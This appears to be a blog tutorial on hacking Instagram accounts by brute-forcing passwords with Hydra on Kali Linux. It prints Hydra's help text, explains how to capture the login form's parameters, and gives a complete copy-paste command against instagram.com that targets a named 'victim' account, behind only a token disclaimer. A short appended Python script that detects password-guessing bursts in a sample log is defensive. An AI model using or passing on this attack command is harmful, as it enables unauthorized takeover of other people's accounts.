Bruteforce Instagram using Hydra

Hello fellas, today we are going to learn how we can easily hack Instagram accounts using one of my favorite tools, Kali Linux, with "Hydra". A great combination, isn't it?

There are well-known methods for cracking passwords over the internet, and several ways as well as several sources by which you can crack/hack passwords. Some examples are phishing attacks, rainbow table attacks, guessing, malware, and yes, of course, the bruteforce attack.


And yes, we are going to use the bruteforce attack in this method. We will be using Kali Linux along with Hydra (a great tool for password cracking) to hack Instagram accounts.

Disclaimer: Hacking is a crime. The tutorial provided in this post is for educational purposes only. Do not use it for any illegal purposes.

Why Bruteforce only?

Passwords are vulnerable to various kinds of attacks, depending on their strength. The most popular of these credential attacks is brute force.

It is a process, method, or algorithm in which your machine/device tries combinations of letters, numbers, and other characters to guess the right password of the victim. Once the right combination matches, it displays the password of the victim on your screen.

What is Hydra?

Hydra is one of the most popular password-cracking tools, well known for its flexibility and speed. It is the fastest login cracker that supports numerous protocols. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

Hydra was written by van Hauser and is additionally supported by David Maciejak. As of the latest update, Hydra development has moved to the public GitHub repository at: https://github.com/vanhauser-thc/thc-hydra.

Hydra was tested to compile on Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1, OpenBSD, OSX, QNX/Blackberry, and is made available under GPLv3 with a special OpenSSL license expansion.

List of protocols that THC Hydra supports:

Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC, and XMPP.

Installing Hydra

Hydra comes pre-installed in Kali Linux, so you don't need to download it. On other Linux platforms you may need to install it separately, along with its libraries and packages. Since this post is specifically for Kali Linux, we assume you are using Kali Linux and all dependencies are already installed.

Open a terminal and type hydra, and it will display the help list as follows:

root@kali:~# hydra -h
Hydra v8.6 (c)2017 by van Hauser/THC & David Maciejak - for legal purposes only
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]
Options:
  -R        restore a previous aborted/crashed session
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to be attacked in parallel, one entry per line
  -o FILE   write found login/password pairs to FILE instead of stdout
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
  -w / -W TIME  waittime for responses (32s) / between connects per thread
  -4 / -6   prefer IPv4 (default) or IPv6 addresses
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -U        service module usage details
  server    the target server (use either this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)
Supported services: asterisk afp cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs - usage only allowed 
for legal purposes. This tool is licensed under AGPL v3.0.
The newest version is always available at http://www.thc.org/thc-hydra
These services were not compiled in: sapr3 oracle.
Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup.
E.g.:  % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)
       % export HYDRA_PROXY_HTTP=http://proxy:8080
       % export HYDRA_PROXY_AUTH=user:pass
Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh

Bruteforce web-based login with hydra

As mentioned earlier, Hydra supports a number of services. One of them is used to bruteforce web-based logins such as a social media login form, a user banking login form, your router's web-based login, etc. The “http[s]-{get|post}-form” module is the one that handles this kind of request. In this post, we will learn how to bruteforce Instagram accounts. Before we fire up Hydra, we should know the arguments we need, listed below:

  • Target : https://www.instagram.com/
  • Login username : username of the victim
  • Password list : the location of the dictionary file containing possible passwords
  • Form parameters : in general, use Tamper Data or a proxy to obtain the request's form parameters. Here I'm using the network developer toolbar in Iceweasel, which is Firefox-based.
  • Service module : http-post-form

Obtaining POST parameters using a browser, Iceweasel/Firefox

Note: If you don't understand this part, simply skip it. There is no need to understand every single step in order to make this hack happen. Just move to the final step.

In your Firefox browser, press the keys ‘CTRL + SHIFT + Q’. Then open the web login page https://www.instagram.com/, and you will notice some text appear on the network developer tab. It tells you which files are transferred to us. Look at the method column: all are GET, since we have not POSTed any data yet.

Help for module http-post-form:
============================================================================
Module http-post-form requires the page and the parameters for the web form.

By default this module is configured to follow a maximum of 5 redirections in
a row. It always gathers a new cookie from the same URL without variables
The parameters take three ":" separated values, plus optional values.
(Note: if you need a colon in the option string as value, escape it with "\:", 
but do not escape a "\" with "\\".)

Syntax:

[url]:[form parameters]:[condition string][:(optional)[:(optional)]
First is the page on the server to GET or POST to (URL).
Second is the POST/GET variables (taken from either the browser, proxy, etc.
 with usernames and passwords being replaced in the "^USER^" and "^PASS^"
 placeholders (FORM PARAMETERS)
Third is the string that it checks for an *invalid* login (by default)
 Invalid condition login check can be preceded by "F=", successful condition
 login check must be preceded by "S=".
 This is where most people get it wrong. You have to check the webapp what a
 failed string looks like and put it in this parameter!
The following parameters are optional:
 C=/page/uri     to define a different page to gather initial cookies from
 (h|H)=My-Hdr\: foo   to send a user defined HTTP header with each request
                 ^USER^ and ^PASS^ can also be put into these headers!
                 Note: 'h' will add the user-defined header at the end
                 regardless it's already being sent by Hydra or not.
                 'H' will replace the value of that header if it exists, by the
                 one supplied by the user, or add the header at the end
Note that if you are going to put colons (:) in your headers you should escape them with a backslash (\).
 All colons that are not option separators should be escaped (see the examples above and below).
 You can specify a header without escaping the colons, but that way you will not be able to put colons
 in the header value itself, as they will be interpreted by hydra as option separators.

To obtain the post-form parameters, type anything into the username and/or password fields. You will notice a new POST method on the network developer tab. Double-click on that line, and on the “Headers” tab, click the “Edit and Resend” button on the right side. From the Request Body, copy the last line, such as “/:username=^USER^&password=^PASS^”. The “^USER^” and “^PASS^” placeholders are the parameters we need.



Kali Linux has a bunch of wordlists; choose the appropriate wordlist or download your own custom dictionary from the internet. You can also use the pre-installed Kali Linux wordlist; you need to locate it and unzip it using the commands shown in the image.


The final step

Alright, now we have all the arguments we need and are ready to fire up Hydra. Here is the command pattern:

hydra -l <username> -P <password list> <Target hostname> <service module> <post request parameters>

Finally, based on the information we have gathered, our command should look something like this:

hydra -l (username of your) victim -P (set path of your dictionary) instagram.com https-post-form "/:username=^USER^&password=^PASS^:Sorry, your password was incorrect. Please double-check your password." -vV -f

  • -l <username> : a single word containing the account's username; use -L <FILE> to refer to a list of possible usernames in a file.
  • -P <FILE> : a file listing possible passwords; use -p <password> to try one literal password instead of guessing from a list.
  • instagram.com : the hostname of the target
  • https-post-form : the service module we use
  • "/:username=^USER^&password=^PASS^:Sorry, your password was incorrect. Please double-check your password." : the 3 parameters needed. The syntax is:
    {page URL}:{request POST body form parameters}:{string that appears on the page after a failed login}
  • -v : verbose mode
  • -V : show login:pass for each attempt
  • -f : terminate the program once a login:password pair is found

Summary

In simpler words, without making you guys suffer through all the terrible information above: you can just copy and paste this command into your terminal and replace two things, the path to your dictionary and the username of the victim.

hydra -l (username of your) victim -P (set path of your dictionary) instagram.com https-post-form "/:username=^USER^&password=^PASS^:Sorry, your password was incorrect. Please double-check your password." -vV -f


Now grab a coffee and wait until Hydra does its work. You have to be patient, as it is a bruteforce attack and it needs time. Once Hydra succeeds in finding a valid login:password pair, it will immediately terminate the job and show the valid credential.
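
On the receiving end, a run like the one above appears in the login service's logs as a burst of failed attempts against a single username. The following Python code is an added example, not part of the original post: it scans a constructed sample log and flags any account or source address with too many failures inside a time window. The log format, the sample entries and the threshold values are all assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)  # assumed policy: look-back window
MAX_FAILURES = 5               # assumed policy: failures tolerated per window

# Constructed sample log (assumed format): timestamp, source IP, username, outcome.
SAMPLE_LOG = """\
2024-05-01T10:00:00 192.0.2.10 bob FAIL
2024-05-01T10:00:40 192.0.2.10 bob OK
2024-05-01T10:01:00 203.0.113.9 alice FAIL
2024-05-01T10:01:01 203.0.113.9 alice FAIL
2024-05-01T10:01:02 203.0.113.9 alice FAIL
2024-05-01T10:01:03 203.0.113.9 alice FAIL
2024-05-01T10:01:04 198.51.100.4 alice FAIL
2024-05-01T10:01:05 203.0.113.9 alice FAIL
2024-05-01T10:01:06 203.0.113.9 alice FAIL
2024-05-01T10:09:00 192.0.2.10 bob FAIL
"""


def detect_guessing(log_text, window=WINDOW, max_failures=MAX_FAILURES):
    """Return (time, kind, key, failures) alerts for every account or source
    address that exceeds max_failures failed logins inside the window."""
    recent = defaultdict(deque)  # (kind, key) -> timestamps of recent failures
    alerted = set()              # keys already reported, so each alerts once
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts_raw, ip, user, outcome = line.split()
        if outcome != "FAIL":
            continue
        ts = datetime.fromisoformat(ts_raw)
        for key in (("account", user), ("source", ip)):
            q = recent[key]
            q.append(ts)
            while ts - q[0] > window:  # drop failures older than the window
                q.popleft()
            if len(q) > max_failures and key not in alerted:
                alerted.add(key)
                alerts.append((ts_raw, key[0], key[1], len(q)))
    return alerts


if __name__ == "__main__":
    for alert in detect_guessing(SAMPLE_LOG):
        print("ALERT", *alert)
```

Counting per account as well as per source address means the account alert fires even when the failures do not all come from one address, and the same counters can drive a lockout or delay on the login form.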
